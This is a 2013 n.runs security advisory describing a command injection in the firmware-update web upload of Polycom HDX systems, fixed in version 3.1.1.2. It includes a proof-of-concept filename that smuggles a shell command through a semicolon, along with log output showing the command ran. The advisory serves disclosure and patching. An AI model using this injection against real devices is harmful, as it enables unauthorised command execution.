n.runs-SA-2013.002 - Polycom - Firmware Update Command Injection

2013-03-19T00:00:00
ID SECURITYVULNS:DOC:29195
Type securityvulns
Reporter Securityvulns
Modified 2013-03-19T00:00:00

Description

n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2013.002 15-Mar-2013


Vendor: Polycom, http://www.polycom.com Affected Products: Polycom HDX Series Affected Version: < 3.1.1.2 Vulnerability: Polycom Firmware Update Command Injection Risk: MEDIUM


Overview:

Polycom HDX systems can be upgraded via Polycom Update Files (PUP files). The upgrade functionality is available in the Polycom administrative web interface.

Description:

The firmware update functionality in the Polycom web interface is vulnerable to a simple command injection vulnerability which allows an attacker with access to the web interface to execute arbitrary commands on the underlying embedded Linux system.

When uploading a PUP file via the web interface the file is first stored on the device and then the filename is passed as an argument to a call to the "puputils.ppc" binary in order to verify its integrity. Missing input validation allows an attacker to inject additional shell commands by using shell metacharacters (such as a semicolon). In order to mount the attack a valid PUP file can be renamed as follows:

$ mv polycom-hdx-release-3.0.5-22695.pup &#39;test;logger PWNED;bla.pup&#39;

When this file is uploaded through the web interface the injected command "logger PWNED" is executed on the system. This can also be observed in the logs:

2012-09-02 20:17:01 INFO unknown: puputils.ppc: pc[0]: Welcome to the PUP Utilities.
2012-09-02 20:17:01 INFO unknown: puputils.ppc: pc[0]: Verifying the integrity of the PUP file "../web2/docroot/data/test"
2012-09-02 20:17:01 ERROR unknown: puputils.ppc: pc[0]: Unable to open file "../web2/docroot/data/test".
2012-09-02 20:17:01 ERROR unknown: puputils.ppc: pc[0]: CalculateFileSHA1 on pup file failed
2012-09-02 20:17:01 ERROR unknown: puputils.ppc: pc[0]: Unable to open file "../web2/docroot/data/test".
2012-09-02 20:17:01 INFO unknown: puputils.ppc: pc[0]: returning PUP_ERR_FILE_CANT_ACCESS
2012-09-02 20:17:01 INFO root: pwned 2012-09-02 20:17:01 INFO jvm: pc[0]: system_pthread: ./puputils.ppc verify ../web2/docroot/data/test;logger pwned;bla.pup [32512]
2012-09-02 20:17:01 ERROR jvm: pc[0]: softupdate: command "./puputils.ppc verify ../web2/docroot/data/test;logger pwned;bla.pup" returned unexpected error 127.

Impact:

Someone with access to the Polycom administrative web interface can execute arbitrary commands on the underlying embedded Linux system. In combination with some other vulnerability such as a Cross-Site Request Forgery vulnerability this attack could potentially be performed even without direct access to the web interface. However we didn't verify that yet.

Solution:

Polycom released version 3.1.1.2 of the HDX software which fixes this issue. It can be downloaded from the Polycom Support page at http://support.polycom.com.


Credit: Bug found by Moritz Jodeit of n.runs AG.


Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact security@nruns.com for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages.

Copyright 2013 n.runs AG. All rights reserved. Terms of use apply.